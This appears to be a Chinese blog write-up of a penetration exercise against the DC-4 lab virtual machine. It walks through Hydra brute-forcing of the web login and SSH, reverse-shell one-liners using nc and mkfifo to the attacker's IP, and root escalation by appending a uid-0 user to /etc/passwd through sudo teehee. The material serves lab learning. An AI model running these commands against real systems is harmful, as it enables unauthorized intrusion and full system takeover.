dc-4靶机渗透记录

最新推荐文章于 2023-12-27 16:46:16 发布
最新推荐文章于 2023-12-27 16:46:16 发布
阅读量3.8k 收藏 4
点赞数 1
分类专栏: 渗透记录 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlllllianqing/article/details/121190382
版权

DC-4靶机

实验环境

  • 靶机:DC-4靶机(192.168.126.138)
  • 攻击机:kali Linux(192.168.126.129)

信息收集

ip:192.168.126.138
开放的端口:

22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

80/tcp开放 http nginx 1.15.10

运行:Linux 3.X | 4.X

操作系统CPE:CPE:/o:linux:linux\u 内核:3 CPE:/o:linux:linux\u内核:4

操作系统详细信息:Linux 3.2-4.9

渗透测试

1.漏洞发现与getshell

因为开启了22端口,这里我们尝试一下直接连接

ssh root@192.168.126.138

image-20211105223852184

直接试不出密码,这里尝试进行弱口令爆破

使用Hydra(九头蛇)进行爆破,爆破字典为rockyou.txt 路径在/usr/share/wordlists/

image-20211105225755735

hydra -l admin -P /usr/share/wordlists/rockyou.txt x.x.x.161 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

在这里插入图片描述
这里看到账号密码被爆破出来

账号:admin

密码:happy

直接进行登录

image-20211105225836936

找到命令执行的地方:command

点击进入,发现可以直接命令执行,考虑bp抓包,但这里发现前端可以直接命令执行

image-20211105230441278

直接反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.126.129 4444 > /tmp/f;

nc -e /bin/bash 192.168.126.129 1234

可以尝试前端直接改,也可以使用bp抓包

image-20211106175950649

*记得得先监听再操作

nc -lnvp 1234

image-20211106180010075

2.提权

使用python获取交互

python -c 'import pty;pty.spawn("/bin/bash")'

image-20211106180419874

搜索文件

image-20211107121214168

进入根目录->home

发现三个用户:charles,jim,sam

进行一一查看,发现除了jim用户,其他两个都是为空

image-20211107121518619

在jim用户文件内找到一个密码字典:old-passwords.bak

这里可以考虑爆破ssh密码,将改密码复制拉取到kali

hydra -L ./dc-4.user -P ./dc-4.pass -vV -t 10 -o dc-4 192.168.126.138 ssh -s 22

在这里插入图片描述在这里插入图片描述
可以看到已经爆破出了jim的密码为jibril04

直接进行ssh登录

image-20211107124128153

查看jim可以执行sudo的命令

image-20211107125049832

没有权限,只能进行文件搜索,寻找其他的用户密码

image-20211107124450199

发现了charles用户交给 jim用户保管的密码

image-20211107124559534

charles:^xHhA&hvim0y

尝试登录charles用户

image-20211107124812916

查看charles用户可执行的sudo命令

image-20211107125211768

可以执行teehee命令

如何使用teehee命令进行提权呢?

参考各位师傅的方法:

使用该命令给**/etc/passwd**里面添加一个用户

perl -le 'print crypt("123456", "aa")'

image-20211107125626373

得到我们要添加的用户的密码:aaAN1ZUwjW7to

echo "good:aaAN1ZUwjW7to:0:0:::/bin/bash" | sudo teehee -a /etc/passwd

image-20211107130000040

切换到good用户:

su - good

密码为前面的1232456

image-20211107130554422

image-20211107130653319

提权成功

总结

渗透步骤

1.ssh爆破失败,通过web爆破进入后台;

2.后台发现命令执行,执行反弹shell,getshell成功;

3.进去进行提权,找到用户密码;

4.拿到jim用户无法提权,通过邮件目录/var/mail找到charles用户密码;

5.charles用户下执行sudo -l 命令,得到了teehee命令,使用该命令提权成功;

自我总结

1.对linux文件目录不熟悉,找到有效信息花了较多时间;

2.对于各种提权操作不熟悉,多是看大佬的博客进行操作;

甜不拉几
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
dc-4靶机练习.docx
01-02
第一步;靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
HackTheBox::Networked
aya3t的博客
10-12 690
HackTheBox::Networked
使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502)
还没想好昵称的新建p的博客
02-22 1万+
本文大致讲述了如何使用 Metasploit 利用 OpenSSH 用户枚举漏洞。请务必遵守相关法律。(CC-BY-ND 4.0)
OpenSSH 曝远程代码执行漏洞,尽快升级
Free雅轩的博客
03-20 1994
BSD、以及其它类Unix平台上SSH 2.0协议的完整支持,主要修复了上一个版本中发现的bug和安全问题。需注意的是,7.4版本的各项底层变化,有可能会影响现有的配置。OpenSSH 7.4已于2016年12月19日正式发布,新版本移植了在。据网络空间搜索引擎 ZoomEye 结果显示,黑客可通过漏洞执行远程代码,或导致数据泄露。OpenSSH 7.3 及以下版本。
靶机渗透练习46-dpwwn-01
hirak0的博客
04-19 494
靶机描述 靶机地址:https://www.vulnhub.com/entry/dpwwn-1,342/ About Release Name: dpwwn-01 Date release: 04 Aug 2019 Author: Debashis Pal Series: dpwwn Description This boot2root is a linux based virtual machine and has been tested using VMware workstation 14. The
OpenSSH 命令注入漏洞(CVE-2020-15778)修复
热门推荐
学渣程序员的博客
06-04 2万+
OpenSSH 命令注入漏洞(CVE-2020-15778)修复 最近安全部门丢了一堆服务器漏洞扫描结果过来,开发运维都得干的我火急火燎又开始去修补漏洞去了。 1. 漏洞介绍 ​ OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.6p1及之前版本中的scp的scp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造
OpenSSH曝高危漏洞 会泄露私钥
weixin_33904756的博客
07-03 313
OpenSSH释出了新版本客户端, 修正了一个会泄露私钥的高危漏洞。漏洞存在于终端用户使用版本中,不影响服务器使用的版本,漏洞影响OpenSSH v5.4到7.1,与一个默认启用的实验性漫游功能代码有关,它允许一台恶意配置的服务器利用漏洞访问联网计算机的内存内容,获取用户用于SSH连接的私钥。 根据SSH的设计,用户即使连接了一个恶意的主机,主机也只知道...
OpenSSH漏洞可导致服务器被暴力破解 研究人员公布利用方法
weixin_33754065的博客
09-04 231
本文讲的是 OpenSSH漏洞可导致服务器被暴力破解 研究人员公布利用方法,利用安全远程访问工具OpenSSH中的一个漏洞,攻击者可绕过认证重试次数的限制,进行大量的口令猜解。一位网名为Kingcope的安全人员近日在博客上发布了这个漏洞的利用方法。 OpenSSH服务器的“键盘交互”认证是打开的,默认设置为允许6次认证尝试,客户端只允许3次,然后就会...
centos升级openssh7.4OpenSSH远程代码执行漏洞
weixin_33738578的博客
05-15 5167
漏洞编号CVE-2016-10009漏洞名称OpenSSH远程代码执行漏洞漏洞描述sshd服务可以利用转发的agent-socket文件,欺骗本机的ssh-agent来加载一个恶意的PKCS#11模块,从而可以远程执行代码。官方评级中危漏洞危害***利用漏洞实现远程命令执行,严重情况下可能会导致数据泄露。漏洞利用条件可以实现远程利用。该漏洞利用依赖ssh-agent。该进程默...
关于OpenSSH远程代码执行漏洞的通报
weixin_34120274的博客
09-04 788
本文讲的是 关于OpenSSH远程代码执行漏洞的通报,近日,互联网上披露了有关“OpenSSH远程代码执行漏洞(CNNVD-201612-616)”的相关情况,引发安全研究人员高度关注。国家信息安全漏洞库(CNNVD)对此进行了跟踪分析,情况如下: 一、漏洞简介 OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套...
第一次感觉来自渗透的攻击
weixin_47616219的博客
08-11 271
本来是整理一下服务器上的日志文件,没啥用的该删的就删了。 闲着就点开看了几个 其中 csftpd 服务就发现了异常 很明显这个 106.13.115.251的ip 在模仿用户登录我的 ftp服务 短时间内就登录多次并使用了不同的用户名来尝试。一下就出一身冷汗,这个企业级的数据可不是随便能泄露的。 赶紧查看 sshd 关键日志 这个 1.204.13.110的ip竟然现在还在不断的连接我的 服务器 就日志来看还没有拿到服务器登录权限 先下手为强,先给这个ip干掉 宁可错杀不可放过 先墙了在说 iptab
【网络安全】记一次红队渗透实战项目_渗透测试红队
wangluoanquan111的博客
06-16 910
信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用 nmap 来演示信息收集。
【漏洞复现】OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385)
最新发布
做自己喜欢的事,并将其发挥到极致!
12-27 3372
OpenSSH 是 SSH(Secure SHell)协议的免费开源实现。SSH协议族可以用来进行远程控制, 或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、 rcp ftp、 rlogin、rsh都是极为不安全的,并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。一个存在于OpenSSH中的命令注入漏洞,攻击者可利用该漏洞注入恶意Shell字符导致命令注入。
SSH爆破攻击及应急响应/事件处置
简介
05-28 3526
随着互联网的不断发展,网络安全越来越得到重视了…实在是编不下去了,就是想随便写一个开头,就没了。提示:以下是本篇文章正文内容,下面案例可供参考ssh(安全外壳协议)(secure shell),是一种加密的网络传输协议,可以在不安全的网络环境中提供安全的传输环境,ssh通过在网络中创建安全隧道来实现ssh客户端与服务端之间的连接,ssh最常见的用途是远程登陆系统,ssh使用率最高的场合是unix系统本文就是很简单地讲解了ssh爆破和防御,THE END。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值